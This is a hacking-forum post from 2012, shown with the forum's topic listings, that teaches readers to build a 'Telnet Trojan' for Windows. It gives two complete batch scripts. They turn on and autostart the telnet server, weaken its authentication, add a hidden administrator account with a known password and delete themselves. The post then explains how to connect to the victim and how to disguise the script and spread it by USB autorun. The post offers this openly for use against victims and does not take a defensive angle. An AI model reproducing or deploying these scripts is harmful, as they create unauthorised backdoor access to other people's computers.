Ethical Experts
Ethical Experts
Ethical Experts
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Ethical Experts

A Community Dedicated to Helping and Learning . Here You Will Get Hacking Tutorials and Monetizing Methods . We Hope You Have a Pleasant Stay
 
HomeHome  SearchSearch  Latest imagesLatest images  RegisterRegister  Log in  
Still Currently working on the forum design, until I find a perfect design that can sit there for the whole life :p .. Please Bare with us if you see the design change while / after you refresh a page or return ! Sorry for the Inconvenience ~!
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Hack Pack : Largest Hacking Tools Collection
Creating a Telnet Trojan for Windows XP  EmptyTue Apr 28, 2015 9:35 am by THE-OUTSIDER

» Hi everyone!
Creating a Telnet Trojan for Windows XP  EmptyFri Nov 07, 2014 11:24 pm by zekrum

» Hacking Email ID's
Creating a Telnet Trojan for Windows XP  EmptyThu Sep 25, 2014 7:22 pm by NAVEEN KUMAR . S

» entering in a computer binary
Creating a Telnet Trojan for Windows XP  EmptySat Sep 20, 2014 1:29 pm by erosh23

» hi hackers
Creating a Telnet Trojan for Windows XP  EmptySat Sep 20, 2014 1:26 pm by erosh23

» Introduce Yourself !
Creating a Telnet Trojan for Windows XP  EmptySat Sep 20, 2014 1:23 pm by erosh23

» Hello guys
Creating a Telnet Trojan for Windows XP  EmptyWed Jul 30, 2014 10:52 pm by RZero67

» need botnet like zues Betabot or any good botnet files please admin help me
Creating a Telnet Trojan for Windows XP  EmptyFri Jul 25, 2014 9:44 pm by sire_roktiv

» Extension Spoofer v0.1 [Beta Release]
Creating a Telnet Trojan for Windows XP  EmptyFri Jul 11, 2014 9:33 am by The Joker

Most Viewed Topics
Hack Pack : Largest Hacking Tools Collection
HACK WIFI PASSWORD USING CMD WHEN YOU ARE CONNECTED WITH WIFI
Hack Your BroadBand !! RISK FREE !!
Hacking With Keyloggers Prorat
How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial
How to Get Unlimited time in an Internet Cafe ... :D
How to Hack Websites & Servers - Tutorial
Cracking a WPA/WPA-2 Password.. ;)
Backtrack and Facebook
Credit Card Generating Sequence
Keywords
LARGEST netcat wifi hack
Facebook Like
Similar topics

 

 Creating a Telnet Trojan for Windows XP

Go down 
AuthorMessage
The Joker
Admin
Admin
The Joker


Posts : 182
Join date : 2012-06-11
Age : 33

Creating a Telnet Trojan for Windows XP  Empty
PostSubject: Creating a Telnet Trojan for Windows XP    Creating a Telnet Trojan for Windows XP  EmptyFri Oct 05, 2012 7:40 am

Following batch script will act as Telnet Trojan to any windows XP system, the best part of it is it's fully undetectable to all ant-virus programs. Copy following lines in notepad and save with any name with .bat extension for example Trojan.bat.

Code:
@echo off
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user h4xor_(od3/add
net user h4xor_(od3 12345
net localgroup administrators h4xor_(od3 /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v h4xor_(od3l /t REG_DWORD /d 00000000
del trojan.bat

The first line will keep echo of commands off.
Second line will ask windows to start telnet server every time the system starts.
Third line asks system to start telnet server for current windows NT systems.
Fourth line will disable NTLM hash security to password file.
Fifth line will add an stream mode to telnet.
Sixth and seventh line will add a user with name h4xor_(od3 having password 12345.
Eighth line will add h4xor_(od3 to administrator group.
Ninth line will ask system to hide existence of user Devil.
Tenth line will delete Trojan script from victim's system.

You can replace word h4xor_(od3 with user name of your choice.

Now you might ask a question why above script will not work on Windows Vista and Windows 7. That's because by default Vista and 7 doesn't install telnet packages. For making above script work on them you have to add some more line but the victim system should be connected to the internet while running script.

Code:
@echo off
pkgmgr /iu:“TelnetClient”
pkgmgr /iu:“TelnetServer”
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user h4xor_(od3/add
net user h4xor_(od3 12345
net localgroup administrators h4xor_(od3 /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v h4xor_(od3 /t REG_DWORD /d 00000000

Now note that above script will work if it is ran with administrative privileges. That means if user account is not administrator then it'll not work. After running this script you can connect victim from any platform having Telnet Client by typing following commands.

C:\>telnet <victim's IP address>

Next above script is very basic example of how to make a Telnet Trojan you can modify the scripts according to your need but there's still a problem with above script. Since its a batch script it will surely pop out to tackle that problem. Download Hidden Bat2EXE maker and convert it into executable file copy it in pen drive create a autorun.inf for your script in it and send it to your victim.
Back to top Go down
http://teamiha.tumblr.com
 
Creating a Telnet Trojan for Windows XP
Back to top 
Page 1 of 1
 Similar topics
-
» Telnet Hacking
» Nessus On Windows
» Bypass Any Windows Password Using ISO Tools

Permissions in this forum:You cannot reply to topics in this forum
Ethical Experts :: Hacking Section :: Hacking Tutorials-
Jump to: